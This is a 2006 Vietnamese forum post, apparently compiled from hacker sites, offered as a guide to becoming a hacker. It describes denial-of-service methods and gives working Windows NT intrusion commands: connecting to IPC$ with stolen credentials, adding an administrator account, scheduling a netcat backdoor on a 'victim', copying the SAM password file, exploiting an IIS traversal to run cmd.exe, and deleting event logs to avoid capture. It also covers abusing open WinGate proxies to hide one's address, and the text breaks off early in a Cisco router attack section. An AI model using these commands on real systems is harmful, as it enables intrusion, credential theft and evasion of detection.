Phương Pháp Hack

178 views
Skip to first unread message

lamp...@yahoo.com

unread,
Dec 14, 2006, 12:20:07 AM12/14/06
to it08th2n

CHUYÊN MỤC

ĐỂ TRỞ THÀNH MỘT HACKER CHÍNH HIỆU

Tấn công server
Dos là gì?
Lệnh cơ bản xâm nhập máy tính
Wingate là gi?

Tấn công hệ thống cisco
Địa chỉ IP là gì?
ISP là gì?
Gói tin TCP/IP là gì?
Làm thế nào để giấu địa chỉ IP
Sử dụng Telnet như thế nào
Sử dụng Hyper Terminal như thế nào
Sử dụng Ping như thế nào
Sử dụng TraceRoute như thế nào
Sử dụng proxy server như thế nào

Đánh cắp mật khẩu
Lấy mật khẩu của WinNT, Win2000
Lấy mật khẩu email

Cài vius format ổ cứng victim

Tạo bom thư

Các lỗi bảo mật
Lỗi bảo mật của PHP

Firewall và cách vượt Firewall
Một số Proxy miễn phí

Cách thức tấn công một trang web mà các hacker
thường sử dụng có nhiều loại, cung nhu nhiều phương
thức khac nhau. Ví dụ như đột nhập vào máy chủ bằng
pass cua Administrator, thay đổi nội dung của trang web, điển
hình của vi dụ này la trường hợp một hacker 17 tuổi
người Thủy Điện đã đột nhập được vào máy chủ
của Bộ Quốc Phòng Mỹ, thay đổi toàn bộ nội dung của
trang web. Một phương thức nữa cũng rất được các hacker
dùng đê tấn công máy chủ, đó là kiểu tấn công DOS,
tôi sẽ nói Dos la gì o phần dưới đây, làm tê liệt hoàn
toàn may chủ, khiến người dùng không thể truy cập vao
internet được....Ngoài ra đối với một hacker không chỉ
co tấn công server vi nếu chi có thế thì công việc quá
chán, việc làm của kẻ gọi la hacker còn la tạo ra vius
tấn công vao máy tinh của người khác mà muc đich có
nhiều khi chỉ đơn giản là thử cho biết :D, Sau đây tôi
sẽ giới thiệu với các bạn một vài cách cơ bản để
có thể trở thành hacker,tất nhiên để có thể trở thành
một hacker không thể chỉ là copy and paste, ma ban cần phải
học để có thể tụ bản thân mình co thể tạo ra virus,
hay tấn công vào một server, nhưng trong khoang thời gian
chờ học thành tài chúng ta thử quậy một chút xem sao.
Nhũng bài viết của tui trong trang web này đều dựa trên
những sưu tầm và tham khảo trên các trang web về hacker
trong và ngoài nước Nhật .

Khuyến cáo : những bai viết của tui ở trang web nay nhằm
mục đích học tập và trao đổi kinh nghiệm, không nhằm
bất cứ mục đich phá hoại nào khác. Các bạn hoàn toàn
co quyền sử dụng nội dung bài viết này với bất kỳ
mục đích gì, trừ việc cướp người yêu của tui :))),
cũng như tự chịu trách nhiệm về hành động...nông nổi
của mình, chúc thành công!!!


--------------------------------------------------------------------------------

Tấn công server

Dos là gi?

Deny of Attcack, tấn công từ chối dịch vụ (DOS), đây là
những điểm cơ bản nhất về tấn công từ chối dịch
vụ.

Có 2 cách để tấn công từ chối dịch vụ là kiểu lame
(tạm dịch là kiểu dành cho những kẻ trình độ thấp)
và elite (cách thức tiên tiến):

Kiểu lame

Bom thư- là kĩ thuật làm cho hòm thư của người khác bị
lụt bởi các bức thư, đây là một trong những dạng
thấp nhất của DOS. Mọi người đều có thể lên mạng
để kiếm vài chương trình boom thư như UNA hoặc KABOOOM ,
điền hòm thư của nạn nhân và … gửi thư. Hòm thư của
nạn nhân sẽ đầy ắp thư hoặc có 1 cách đơn giản hơn
đó là đăng kí địa chỉ của hắn với một site sex, hòm
thư của hắn sẽ bị boom mà bạn chẳng cần phải làm gì
cả.

Nếu như nạn nhân là admin của một site nào đó thì bằng
cách boom thư bạn đã tiêu tốn một lượng lớn không gian
đĩa cứng của hắn.

Đăng nhập liên tiếp: giả sử một mail server cho phép
bạn đăng nhập một số ít lần và bạn biết tên đăng
nhập của hắn, bạn có thể dùng một chương trình để
đăng nhập liên tiếp, khi đó nạn nhân sẽ không thể
đăng nhập vào hòm thư, như vậy là bạn đã khoá đường
vào của hắn.

Bây giờ thì sẽ là những cách tiên tiến hơn nhưng cũng
đòi hỏi ở bạn trình độ và sự thông minh của bạn

Tràn Syn
Đây là cách tấn công vào phương thức bắt tay của TCP/IP
Trước tiên chúng ta hãy tìm hiểu một chút về TCP/IP

Cách bình thường:-
Syn-packet được gửi tới máy chủ bởi máy khách có ý
định thiết lập kết nối

SYN
Máy khách --------------> Máy chủ

Ở bước thứ 2 máy chủ sẽ trả lời với một gói
SYN/Ack tới máy khách

SYN/ACK
Máy khách <-------------- Máy chủ


Bước thứ 3 và là bước cuối cùng.
Máy khách trả lời bằng một gói ack tới máy chủ và cơ
chế bắt tay ba bước được hoàn thành

Bây giờ đến phần tấn công
Nhiều Syn-packet được gửi tới máy chủ thông qua một
địa chỉ IP giả (địa chỉ IP chết hoặc không có), sau
đó điều gì xảy ra, máy chủ sẽ trả lời với gói
syn/ack và máy chủ đợi gói ack xác nhận. Nhưng vì địa
chỉ IP không tồn tại nên nó vẫn phải chờ đợi, do
vậy nó trì hoãn và tiêu tốn tài nguyên của hệ thống
và làm cho hệ thống bị treo hoặc khởi động lại.

Land attack
Tấn công kiểu land attack cũng giống như tấn công kiểu
tràn Syn nhưng thay bởi địa chỉ IP giả mạo hoặc chết
thì nó sử dụng chính ngay IP của mục tiêu. Nó tạo ra
một vong lặp vô tận và hệ thống đích bị phá vỡ.
Nhưng hầu hết hệ thộng đều được thiết lập để
chống lại kiểu tấn công này.

Smurf Attack
Là một dạng tấn công kiểu brute force (hàng loạt), trong
đó một số lượng khổng lồ các router (định tuyến)
sử dụng địa chỉ IP giả từ bên trong mạng đích, do
đó khi nó nhận tín hiệu ping (thăm dò) nó sẽ phản hồi
và làm lụt mạng. Và làm ngưng trệ giao thông mạng.

Lụt Udp
Đây là dạng tấn công 2 hệ thống đích và có thể sử
dụng để ngừng các dịch vụ của 2 hệ thống. Cả 2 hệ
thống được kết nối tới nhau, một tạo ra một chuỗi
các kí tự cho mỗi gói nhận, theo cách nói khác là tạo ra
các kí tự yêu cầu UDP trong khi đó hệ thống còn lại
sẽ phản xạ lại mọi thông điệp mà nó nhận được. Do
vậy tạo nên một vòng lặp vô hạn giữa 2 hệ thống,
mọi dịch vụ khác giữa chúng bị tê liệt.

Ping of death
Kiểu tấn công này sẽ không làm việc được đối với
các máy chủ đã được thiết lập để phòng ngừa nó.
Trong kiểu tấn công này hệ thống đích được thăm dò
bởi một gói vượt quá kích thước bình thường cho phép
bởi giao thức tcp/ip và sẽ làm cho hệ thống đích bị
treo hoặc khởi động lại

Tear Drop
Khi dữ liệu được gửi từ một hệ thống tới hệ
thống khác nó được chia ra thành những mảnh nhỏ hơn và
được máy đích tập hợp lại. Các gói này có một
trường offset trong phần đầu của gói TCP là phần qui
định phần dữ liệu nào được gửi đi. Nó kết hợp
với số chuỗi, giúp cho máy đích có thể tập hợp các
gói lại.

Trong phương thức tear drop các gói được chuyển đi với
trường offfset chồng chéo, khiến cho máy nhận không thể
ráp chúng lại và dẫn tới bị phá vỡ.

Có một kiểu tấn công mới gọi là DDOS trong đó nhiều
máy tính được sử dụng để tấn công từ chối dịch
vụ.

Tuy nhiên đây đều là những cách tấn công khá căn bản
và các máy chủ bây giờ đều được trang bị để phòng
chống mấy cái này . Cao hơn nữa là DDOS (Distributed DOS )
và DRDOS (Distributed Reflection DOS) . 2 thằng này chủ yếu
tấn công qua giao thức TCP/IP cổng 80 hoặc UDP cổng 80 .Ở
DDOS thì có một cái nữa là Zombie Code , nó giống như một
dạng Client/Server progam . Zombie Client được cài trên một
máy con tốc độ truy cập Internet lớn , còn Zombie Server
sẽ chỉ ra khi nào được tấn công và tấn công cái gì .
DRDOS là một phương thức cải tiến của kiểu tấn công
SYN/ACK , cũng gửi hàng ngàn gói SYN tới router. Router lấy
thông tin từ các gói và gửi lại gói SYN/ACK tới IP nạn
nhân .Những người am hiểu và có khả năng tấn công
bằng những cái này thực sự không nhiều , mà nhiều là
những người sử dụng các chương trình viết sẵn để
tấn công thôi.

Trở về đầu trang

Các lệnh cơ bản để xâm nhập máy tính

Phần 1 : Net

chỉ cần bố cháu có được User và Passwords của một IP
nào trên Net...thế là bố cháu có thể kết nói một IPC$
rồi đấy....bây giờ tui xin ví dụ là bác có được User
la hbx và passwords : 123456...IP : 127.0.0.1

Hãy mở trình Ms dos và gõ vào lệnh sau :

Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một
IPC$ với máy victtim

nhưng thao tác tiếp theo..bạn nhất thiết phải login xong
mới có thể sử dũng

-----------------------------------------------------------------------------------------------

bây giờ chúng ta nói tiếp làm thế nào để tạo một user
mới ...

chúng ta cộng thệm môt user mới là heibai và password
lovechina

Net user heibai lovechina / add

nếu bạn thành công..thì có thể cộng user này vào nhom
Adminstrator

Net Localgroup Adminstrator heibai / add

----------------------------------------------------------------------------------------------------

trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên
computer

Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )

Z là của mình...còn C$ là của Victim

-------------------------------------------------------------------------------------------------------

Phần 2 : AT

thông thường thì khi độp nhập vào máy tính..chúng ta sẻ
tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi
copy trojan lên máy rồi...làm thế nào dể khới động nó
đây ?

chúng ta phải dùng đến lệnh AT thôi.....

đầu tiên...chúng ta cần biết thời gian của đối phương

Net time \\127.0.0.1

bây giờ thì nó sẽ phản hồi thời gian của victim...vd :
12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1

AT \\127.0.0.1 12:3 nc.exe

ở đây giả thiết là tui có con trojan la Nc.exe và đã
được copy lên máy victim rồi

* giới thiệu chút it về NC...NC là từ viết tắc của
NETCAT....nó là một telnet server với port 99

đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và
chúng ta có thể connected đến port 99..thế là xong phần
lưu bút

---------------------------------------------------------------------------------------------------------

phần 3 : Telnet

đây là một lệnh rất cần thiết khi xâm nhập máy
tính...nó có thể kết nối vớ máy tính khắc từ
xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã
Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok

Telnet 127.0.0.1 99

thế là bồ đã kết nối đến port 99 và có thể thực
hiện tất cả các lệnh...

-----------------------------------------------------------------------------------------------------------

Phần 4 : Copy

bây giờ chúng ta nói tiêp...làm thế nào để copy files
trên máy mình lên máy victim và làm ngược lại....nhưng
bạn phải có kết nối IPC$ cái đã....

chúng ta copy files index trên ổ C của mình lên ổ C của
127.0.0.1

Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Copy \\127.0.0.1\Admin$\repair\sam._c:\

------------------------------------------------------------------------------------------------

phần 5 : Set

nếu bạn muốn hack một website......tất nhiến là phải
mở port 80..nếu không thì hack cho ai xem ?

đã tới lúc dùng lệnh Set rồi

sau đây là kết quả mà tớ tìm thấy......chúng ta phân
tích nghe....chủ yếu là muốn biêt homepage nó ở đâu
thôi.....

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL
ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU
DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết
đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn
là sẽ View được rất nhiều files đấy`.....

---------------------------------------------------------------------------------------

phần 6 : Nbtstat

nếu cậu Scan đuợc một máy sữ dụng Winnt...open port
135-139...thế thì bồ phải dùng lệnh này để biết thêm
user thôi...

* tiện thể xin nói luôn...đây là netbios....sau khi có user
rồi bạn có thể đoán mò password..nếu không thi Cracking
luôn đi

Nbtstat - A XXX.XXX.XXX.XXX

sau đây là kết quả tớ scan được.....

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered
Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

kết quả cho biết User là PENTIUMII。

-------------------------------------------------------------------------------------------

phần 7 : Shutdown

nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là
lệnh shutdown server Winnt

Shutdown \\127.0.0.1 t:20

20 giây sau...Winnt sẽ tự khời động lại.......hi vọng
các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó
sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker
có đạo đức

---------------------------------------------------------------------------------------------------------------------------------

phần 8 : Dir....

lệnh này không có gì để nói hết..chỉ dùng để view
thôi.................

-----------------------------------------------------------------------------------------------

phần 9 : Del

lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta
xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin
của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm
cổ hả ?

sau đây là những files nhật ký của Winnt

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

chỉ cần del hết là coi như xong

-------------------------------------------------------------------------------------------------------------------

ngoài ra những lệnh trong ms dos còn rất nhiều....như lệnh
ECHO .....FTP.........ATTRIB......mà ở đây tui không thể kể
ra hết đươc

Trở về đầu trang


Wingate la gì, va nó liên quan gì tới server acttack?

WinGate là một chương trình đơn giản cho phép bạn chia
các kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với
2 máy.
WinGate dùng với nhiều proxy khách nhau có thể che giấu
bạn.

2. Mặc định sau khi cài đặt

Khi bạn cài WinGate bình thường, không thay đổi thông số
gì thì sẽ có một số mặc định:

Quote
Port | Service
23 Telnet Proxy Server - This is default and running right after
install.
1080 SOCKS Server - This once setup via GateKeeper has no password
until you set one.
6667 IRC Mapping - This once setup via GateKeeper has no password until
you set one.

3. Port 23: Telnet Proxy

Proxy sẽ chạy ngay sau khi bạn hoàn thành cài đặt và làm
mọi thứ trở nên tồi tệ nếu không có mật mã sau khi
cài đặt và không đòi hỏi bạn là người duy nhất.
Nhiều quản trị hệ thống không biết việc này và cũng
không nghĩ sẽ đặt mật mã cho nó và đây là nơi xuất
hiện trục trặc.

Telnet proxy cũng thật sự đơn giản. Bạn telnet trên cổng
23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ có
dấu nhắc WinGate> Tại dấu nhắc này bạn đánh vào server,
một khoảng trống và cổng bạn muốn kết nối vào.

Thí dụ:
Quote
telnet wingate.net
Connected to wingate.net

WinGate> victim.com 23

Thí dụ này cho thấy một ai đang dùng telnet vào WinGate
server và sau đó từ WinGate server đó telnet tới victim.com
vì vậy trên log của victim.com sẽ hiện ra IP của wingate
(wingate.net) và vì vậy có thể giữ IP của mình bí mật.

4. Port 1080: SOCKS Proxy

Socks proxy không được cài đặt mặc định nhưng ngay sau
khi dùng GateKeeper sẽ cài đặt nó. Việc cài đặt này
không cần password, trừ khi bạn có đặt. Nếu bạn quen
với socks bạn có thể biết nhiều việc có thể làm với
nó.

5. Port 6667: IRC Proxy

IRC proxy cũng giống như khi chúng ta dùng wingate telnet proxy
bounce tới irc server trừ khi irc proxy đã được thiết lập
để đến một server. Nó không được thiết lập để
chạy sau khi cài đặt nhưng sau khi bạn cài sẽ không cần
password, trừ khi bạn có đặt.

6. Làm thế nào để tìm và sử dụng WinGate?

Tìm WinGates cũng rất dễ làm. Nếu bạn muốn tìm IP
WinGates tĩnh (IP không đổi) thì đến yahoo hay một trang
tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người
dùng cable modems có WinGate để họ có thể chia sẻ đường
truyền rộng của nó cable modems cho những máy khác trong
nhà. Một công ty cable modem lớn là Cox Cable. Trang web của
họ có thể tìm thấy ở <a href="www.home.com"
target='_blank'>www.home.com</a>. The Cox Cable có IP trong khoảng
24.1.X.X.
Bạn có thể dùng Port hay Domain scanners và scan Port 1080, tên
gọi là SOCKS Proxy, đây cũng là một cách đơn giản để
tìm WinGate.

Thí dụ:
24.1.67.1 chỉ đến c224084-a.frmt1.sfba.home.com mà tại đó
chúng ta biết sfba = San Fransico Bay Area hay cái gì gần như
vậy.
Đó là cách tìm IP WinGates tĩnh. Để tìm IP động (IP thay
đổi mỗi lần user kết nối vào internet) của WinGates cũng
không khó chút nàol. Hầu hết tất cả ISP lớn và nhỏ
đều có user dùng WinGate. Bạn cần phải biết định dạng
của ISP's dynamic ppp addresses hoặc bạn có thể dùng IRC
(Internet Relay Chat). Giả sử bạn có ppp IP của
armory-us832.javanet.com. Bây giờ bạn dns IP đó và có
209.94.151.143. Bây giờ lấy IP đó và đưa nó vào domain
scanner program.

Thí dụ: Domscan có thể tìm thấy tại Rhino9 web site (<a
href="rhino9.abyss.com" target='_blank'>rhino9.abyss.com</a>). Ok, bây
giờ bạn đã có domscan. Chạy domscan và có một box để
đặt IP và port để scan. WinGate telnet proxy theo mặc định
chạy trên cổng 23. Vì vật đặt 209.94.151.143 vào trong box
đầu tiên trong domscan và 23 trong box thứ 2, sau đó click
vào start. Ta có được kết quả:

209.94.151.2
209.94.151.4
209.94.151.6
209.94.151.10
209.94.151.8
209.94.151.73
209.94.151.118
209.94.151.132

Bây giờ kiểm tra từng cái để tìm WinGate prompt. Để làm
vật ta telnet tới 209.94.151.2 trên cổng 23 và nếu nó hiện
WinGate> khi chúng ta kết nối thì nó là WinGate. Nếu không
chúng ta làm tiếp địa chỉ kế tiếp có thể là
209.94.151.4. Chúng ta làm như vậy cho đến hết danh sách IP.

Ghi chú: Nếu chúng ta scan dynamic IP WinGates nếu số cuối
cùng của IP càng lớn thì hy vọng nó là IP của WinGate
càng lớn. Thí dụ: Cơ hội 209.94.151.132 là WinGate lớn hơn
209.94.151.2.

Trở về đầu trang


--------------------------------------------------------------------------------

Tấn công hệ thống Cisco

Cảnh báo:

Đây là bài viết được sưu tầm từ trang web VNHacker,
mục dích chỉ nhằm nghiên cứu và hoc tập
KHÔNG ĐƯỢC sử dụng tài liệu này để phá hoại các
hệ thống cisco, hoặc thâm nhập bất hợp pháp vào hệ
thống. Tài liệu này chỉ nhằm mục đích giáo dục. Chỉ
sử dụng tài liệu này một cách hợp pháp (Wargames của
các hacker chẳng hạn.), và không được phá hoại bất kì
cái gì. Đây là một bài học dẫn dắt từng bước một
về cách một những điểm yếu của cisco dẫn tới việc
có thể bị truy nhập trái phép. Nếu bạn bị bắt quả
tang đang đột nhập vào một bộ dẫn đường cisco, hoặc
làm rối loạn hệ thống, bạn có thể làm gián đoạn
hàng trăm người dùng internet, tốn kém hàng ngàn đôla, cho
nên chỉ sử dụng tài liệu này khi bạn được cho phép !
Sử dụng sai tài liệu này sẽ làm cho bạn gặp rất
nhiều rắc rối.

Chú ý: một số bài học được viết cho hệ Unix, và
không được chuyển soạn cho
DOS/hay tương thích Windows, cho nên bạn sẽ phải xem tài
liệu này bằng trình duyệt Web, hoặc Microsoft Word.

-------------------------------------

- Phần 1: Tại sao lại xâm nhập bộ dẫn đường cisco?

- Phần 2: Tìm một bộ dẫn đường cisco như thế nào ?

- Phần 3: Làm thế nào thâm nhập vào bộ dẫn đường
cisco ?

- Phần 4: Phá mật khẩu như thế nào ?

- Phần 5: Sử dụng bộ dẫn đường như thế nào ?

-----------------------------------

Những thứ CẦN biết TRƯỚC khi bạn bắt đầu:

-----------------------------------

Địa chỉ IP là gì?

Địa chỉ IP là gì?

IP là từ viết tắt của Internet Protocol, địa chỉ IP
được sử dụng bởi các máy tính khác nhau để nhận
biết các máy tính kết nối giữa chúng. Đây là lí do
tại sao bạn lại bị IRC cấm, và là cách người ta tìm ra
ISP của bạn.
Địa chỉ IP có thể dễ dàng phát hiện ra, người ta có
thể lấy được qua các cách sau :
- bạn lướt qua một trang web, IP của bạn bị ghi lại
- trên IRC, bất kì ai cũng có thể có IP của bạn
- trên ICQ, mọi người có thể biết IP của bạn, thậm
chí bạn chọn "do not show ip" người ta vẫn lấy được nó
- nếu bạn kết nối với một ai đó, họ có thế gõ
"systat", và biết được ai đang kết nối đên họ
- nếu ai đó gửi cho bạn một email với một đoạn mà
java tóm IP, họ cũng có thể tóm được IP của bạn

Có rất nhiều cách tóm địa chỉ IP, bao gồm cả việc
sử dụng các chương trình back-door như Sub7 hoặc NetBus.

Thế nào là một ISP?

ISP viết tắt cho Internet Service Provider, đó là những công
ty mang internet đến cho bạn. Bạn kết nối đến họ mỗi
khi bạn dial-up và tạo một kết nối. Mọi người có thế
phát hiện ra ISP của bạn chỉ đơn giản bằng cách
traceroute bạn (traceroute sẽ được giải thích sau). Nó sẽ
trông như thế này:

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.

Gói tin TCP/IP là gì?

TCP/IP viết tắt cho Transmission Control Protocol and Internet
Protocol, a Gói tin TCP/IP là một khối dữ liệu đã được
nén, sau đó kèm thêm một header và gửi đến một máy
tính khác. Đây là cách thức truyền tin của internet, bằng
cách gửi các gói tin. Phần header trong một gói tin chứa
địa chỉ IP của người gửi gói tin. Bạn có thể viết
lại một gói tin và làm cho nó trong giống như đến từ
một người káhc!! Bạn có thể dùng cách này để tìm
cách truy nhập vào rất nhiều hệ thống mà không bị
bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương
trình cho phép bạn làm điều này. Bài giảng này sẽ không
đưa ra cách sử dụng biện pháp này trên bộ dẫn đường
Cisco, những sẽ nằm trong tầm tay khi hack vào một hệ
thống. Nếu gặp rắc rối khi bạn thử hack vào một hệ
thống, sử dụng cách này...

Làm thế nào để giấi IP của bạn:

Tìm một chương trình như Genius 2 hoặc DC IS, chúng sẽ cho
phép bạn chạy IdentD. Các chương trình này sẽ thay đổi
phần đầu của IP máy tính của bạn ngay lập tức! Dùng
cách này khi bạn bị đuổi ra khỏi IRC chat room.... bạn
sẽ có thể quay lại ngay lập tức! Bạn cũng có thể sử
dụng cách này khi bạn truy nhập vào một hệ thống khác
và như thế nó sẽ log id sai

Sử dụng telnet :

Bạn mở telnet đơn giản băng cách chọn Start Menu rồi Run
và gõ "telnet".

Một khi bạn đã mở được telnet, bạn sẽ muốn thay
đổi một vài tính năng. Chọn Terminal>Preferences. Tại đây
bạn có thể thay đổi kích thước vùng đệm font, và một
cái thứ nữa. Bạn cũng có thể bật/tắt "local echo", nếu
bạn bật,
máy tính sẽ hiển thị mọi thứ bạn gõ vào, và các máy
tính khác cũng sẽ hiện cho bạn thấy.
Và bạn có thể sẽ nhận được những thông điệp tương
tự như thế này.

bạn gõ "hello", và bạn nhận được
hhelelollo

Điều này xảy ra bởi vì thông tin đã phản hồi lại và
những gì nhận được là những gì bạn đã gõ. Lí do duy
nhất tôi dùng chương trình này bởi lẽ nó không trả về
những gì bạn gõ
Mặc định, telnet sẽ kết nối với một hệ thống bằng
cổng telnet, cổng số 23. Và từ bây giờ bạn sẽ không
chỉ kết nối băng cổng 23, và khi bạn kết nối, bạn có
thể chọn đổi sang dùng cổng 25 chẳng hạn, cổng này
được dùng bởi các mail servers. Hoặc có thể là cổng 21,
cho FTP. Có hàng nghì cổng, cho nên bạn phải chọn đúng
cổng cần thiết

Sử dụng HyperTerminal:

HyperTerminal cho phép bạn thiết lập một "server" trên bất
kì cổng nào của máy tính của bạn để thu nhận thông
tin đến từ các máy tính nhất định. Để làm được
điều này, chọn Start > Programs > Accessories > Communications >
HyperTerminal.
Đầu tiên bạn cần phải lựa chọn kết nối, bấm "TCP/IP
Winsock", và sau đó đặt vào máy tính mà bạn kết nối
với, và số cổng. Bạn có thể sai khiến nó nghe ngóng
đầu vào bằng cách chọn Call>Wait for Call. Và bây giờ các
máy tính khác có thể kết nối với bạn bằng cổng đó,
và bạn có thể chat hay truyền file.

Sử dụng Ping:

Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ "ping
địa_chỉ_ip", mặc định sẽ ping 4 lần, nhưng bạn cũng
có thể gõ

"ping ip.address -t"

Cách này sẽ làm máy ping mãi. Để thay đổi kích thước
ping làm như sau:
"ping -l (size) địa_chỉ_ip "
Cái ping làm là gửi một gói tin đến một máy tính, sau
đó xem xem mất bao lâu gói tin rồi xem xem sau bao lâu gói
tin đó quay trở lại, cách này xác định được tốc độ
của kết nối, và thời gian cần để một gói tin đi và
quay trở lại và chia bốn (gọi là "trip time"). Ping cũng có
thể được dùng để làm chậm đi hoặc đổ vỡ hệ
thống bằng lụt ping. Windows 98 treo sau một phút lụt ping
(Bộ đệm của kết nối bị tràn – có qua nhiều kết
nối, nên Windows quyết định cho nó đi nghỉ một chút).
Một cuộc tấn công “ping flood” sẽ chiếm rất nhiều
băng thông của bạn, và bạn phải có băng thông lớn hơn
đối phương ( trừ khi đối phương là một máy chạy
Windows 98 và bạn có một modem trung bình, bằng cách đó
bạn sẽ hạ gục đối phương sau xấp xỉ một phút lụt
ping). Lụt Ping không hiệu quả lắm đổi với những đối
phương mạnh hơn một chút. trừ khi bạn có nhiều đường
và bạn kiểm soát một số lượng tương đối các máy
chủ cùng ping mà tổng băng thông lơn hơn đối phương.
Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ
ping mục tiêu một cách liên tục, với những khoảng ngắt
quãng giữa hai lần ping liên tiếp. Trong tất cả các hệ
Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt
thực sự. Thực tế là phải ping -f nếu bạn dùng một
bản tương thích POSIX (POSIX - Portable Operating System Interface
dựa trên uniX), nếu không nó sẽ không phải là một bản
Unix/Linux thực sự, bởi vậy nếu bạn dùng một hệ
điều hành mà nó tự cho nó là Unix hay Linux, nó sẽ có
tham số -f.

Sử dụng TraceRoute:

Để lần theo kết nối của bạn(và xem tất cả các máy
tính nằm giữa bạn và mục tiêu), chỉ cần mở MS-DOS
prompt, và gõ "tracert địa_chỉ_ip" và bạn sẽ thấy một
danh sách các máy tính nằm trên đường giưa máy tính bạn
và đối phương.

Bạn có thể dùng cách này để xác định xem liệu có
firewalls chặn? Và cách này cũng cho phép xác định ISP của
một ai đó (Internet Service Provider).

Để xác định ISP, chỉ việc đơn giản xem địa chỉ IP
trước cái cuối cùng, đây chắc chắn là một trong các
bộ dẫn đường của một ISP.

Bản chất là gì? Đây là cách mà traceroute làm việc -
một gói tin TCP/IP có một giá trị trong phần đầu (đó
là phần IP. Nếu bạn không biết nó là gì, hãy bỏ qua
vàthen ignore nó và đọc tiếp, điều đó không quan trọng)
gọi là TTL, viết tăt cho Time To Live. Một khi gói tin đi qua
một bộ dẫn đường thì TTL của nó bị trừ đi một.
Đây là cách một bộ đếm chống lại khả năng xảy ra
lỗi và một gói tin sẽ bắn ra khắp nơi trên mạng, và
lãng phí băng thông.
Cho nên khi một TTL cua một gói tin bằng 0, nó sẽ chết và
một lỗi ICMP được gửi trả về người gửi.
Bởi thế, đầu tiên traceroute gửi đi một gói tin có TTL
bằng 1. Gói tin sẽ trở lại nhanh chóng, qua việc nhận
biết địa chỉ người gử trong phần đầu của thông báo
lỗi ICMP, traceroute biết gói tin đã ở đâu trong lần bắn
đầu tiên. Sau đó nó gửi một gói tin với TTL có giá
trị là 2, và nhận được kết quả trả về của lần
bắn 2, mang theo định danh của máy. Và điều này xả ra
cho đến khi gói tin đến đích.

Thật thú vị phải không? :-)

Sử dụng proxy server:

Hãy tìm một proxy server chạy trên một cổng mà bạn
chọn. Một khi bạn tìm ra, kết nối đến nó bằng telnet
hoặc hyperterminal và sau đó nối đến máy tính khác bằng
proxy server. Bằng cách này máy tính ở đầu kia sẽ không
